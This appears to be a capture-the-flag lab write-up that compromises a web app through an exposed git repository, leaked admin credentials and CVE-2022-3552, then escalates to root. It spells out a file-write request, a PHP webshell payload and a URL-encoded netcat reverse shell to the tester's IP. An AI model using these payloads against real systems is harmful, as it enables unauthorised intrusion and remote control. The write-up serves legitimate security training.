CTF-200-06

Target IP: 192.168.250.27
Challenge Description: N/A.


Reconnaissance

994fd559e38c65b8f7016eb45628afd9.png
There are two TCP ports open on the target machine: SSH and HTTP, as shown above.

7002b6c8c25ecba66780cf7ab41f8d74.png
Performing an aggressive port scan against the two TCP ports returns the result above. I will start enumeration with the web application on port 80. After rescanning the target machine, I managed to find out more information about the target machine: it has a git repository!


Enumeration

Port 80: HTTP
4c23a0ae946454673cd2b261f5b6b534.png
I tried to browse to http://192.168.250.27 on my machine. However, I was presented the VHOST name bullybox.local. I added this VHOST name in my /etc/hosts file. Now my /etc/hosts contains the entry above in the image.

21b70d6e0b9000be6223a49747b1d519.png
Now the webpage above is displayed after making the changes to my /etc/hosts file. I tried default credentials, but I had no luck.

1e026399f133baddb4daf8b396b698ce.png
Doing a source-code scan shows the application version is 4.22.1.5, as shown above.

e9a26ff44cd4ac23b8e9c58fc6f2a902.png
I registered an account, but I did not find anything useful. I will need to obtain the admin account. Maybe the git repository contains sensitive data?

e123030ce5dcd55878b41a13ad589403.png
Browsing to http://bullybox.local/.git displays the webpage above. Apparently I do not have access to the resource. But from previous knowledge, I know it is possible to bypass this using tools such as git-dumper.

a60e4d635f41782545f68feda877d4ad.png
Using git-dumper, I dumped the contents of the git repository in a directory called dumped.

ae4b9b129e5b01a9f16d584e30ca8413.png
The tool successfully managed to dump 611 directories and 3497 files as shown above.

d7e6fa876600512572011e1b0a09c194.png
Checking the HEAD shows the important information above. The admin's name is Yuki and their email address is admin@bullybox.local as shown above.

70377070985d2b67564c6a28a3a4975f.png
The file bb-config.php contains the credentials of the user admin shown above. The credentials admin:Playing-Unstylish7-Provided is interesting. Also, in the image above, the /bb-admin sounds like the admin panel.

f738a44112b441e732dd1c782aaa1aa1.png
Browsing to http://bullybox.local/bb-admin displays the webpage above. At the bottom of the webpage, the version 4.22.1.5 of the application is also specified.

de539c8a2af6224dfb17ae977f6d7b19.png
And bingo! Using the credentials admin:Playing-Unstylish7-Provided works! Now I have access to the web application as the admin user as shown above. Now I have the admin credentials and the verified application version, time to search for any vulnerabillities.

444d9a63f27059e2727b9ff803d612c0.png
The application seems to be vulnerable to RCE as shown above. It has the CVE of CVE-2022-3552.


Exploitation, Privilege Escalation, and Flag

a9d283d711d0be8168b57b402dc6131d.png
I found the PoC above for this exploit. I tried this exploit against the target machine.

c0a11f49556bdaee4015dad1abd8dadd.png
I made a POST request to /api/admin/Filemanager/save_file with the value order_id=1&path=ax.php&data=<%3fphp+phpinfo()%3b%3f> and obtained the result true as shown above. It looks like the file was uploaded with the name ax.php at the current working directory.

19d319e10d1bae3ab8ae18b1aa8bcc36.png
Now browsing to ax.php works as the phpinfo.php page is shown, as shown above. Time to upload a webshell.

900f4a2972d8133761b30d5a3b564f4b.png
I uploaded the URL-encoded PHP webshell <%3fphp+echo+system($_GET['cmd'])%3b%3f>. I named this file as shell.php. This was uploaded successfully as shown above.

3fc0197fecb9b8223363ec9ea0571b86.png
And I can access my PHP webshell at http://bullybox.local/shell.php. I issued the commands id;whoami;ls and received the output above. The commands were executed successfully. Time to obtain a reverse shell connection now.

68d57e672e069a158f1678f9d35b51b3.png
I started a listener on my machine at port 80. Then using the PHP webshell, I deployed the URL-encoded nc reverse shell code rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%20192.168.45.176%2080%20%3E%2Ftmp%2Ff. And now I have a reverse shell connection on my machine at port 80 with the session as the user yuki as shown above. Now I have a foothold on the target machine.

38dba4e34bf812f23191ca660b96d22d.png
I tried to find the local.txt flag, but there was none. Running sudo -l shows all commands can be executed as root. To spawn a root shell, I entered the command sudo bash. It seems like this machine only has proof.txt flag. And this flag is shown above. I was able to read this after spawning a root shell.